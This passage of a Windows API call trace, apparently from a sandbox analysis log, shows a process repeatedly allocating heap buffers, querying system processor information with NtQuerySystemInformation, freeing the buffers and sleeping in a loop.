ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0302.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.111] Sleep (dwMilliseconds=0x110) [0302.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0302.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0302.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0302.133] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0302.133] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0302.133] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.134] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0302.134] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0302.134] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.134] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0302.134] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.134] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.134] Sleep (dwMilliseconds=0x110) [0302.137] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0302.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.138] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0302.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0302.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0302.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0302.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0302.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0302.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0302.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.144] Sleep (dwMilliseconds=0x110) [0302.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0302.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0302.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0302.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0302.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0302.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0302.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0302.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0302.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.163] Sleep (dwMilliseconds=0x110) [0302.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0302.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0302.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0302.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0302.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0302.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0302.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.176] Sleep (dwMilliseconds=0x110) [0302.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0302.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0302.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0302.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0302.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0302.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0302.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0302.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0302.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.196] Sleep (dwMilliseconds=0x110) [0302.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0302.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0302.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0302.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0302.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0302.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0302.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0302.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0302.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.203] Sleep (dwMilliseconds=0x110) [0302.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0302.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0302.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0302.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0302.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0302.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0302.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.453] Sleep (dwMilliseconds=0x110) [0302.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0302.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0302.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0302.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0302.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0302.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0302.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0302.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0302.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.579] Sleep (dwMilliseconds=0x110) [0302.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0302.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0302.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0302.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0302.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0302.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0302.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0302.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0302.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.599] Sleep (dwMilliseconds=0x110) [0302.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0302.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0302.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0302.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0302.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0302.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0302.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0302.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0302.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.614] Sleep (dwMilliseconds=0x110) [0302.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0302.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.622] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0302.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0302.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0302.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0302.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0302.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0302.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0302.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.624] Sleep (dwMilliseconds=0x110) [0302.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0302.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0302.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0302.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0302.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0302.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.648] Sleep (dwMilliseconds=0x110) [0302.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0302.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0302.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0302.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0302.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0302.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0302.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0302.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0302.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.672] Sleep (dwMilliseconds=0x110) [0302.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0302.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0302.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0302.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0302.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0302.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0302.691] RtlAllocateHeap 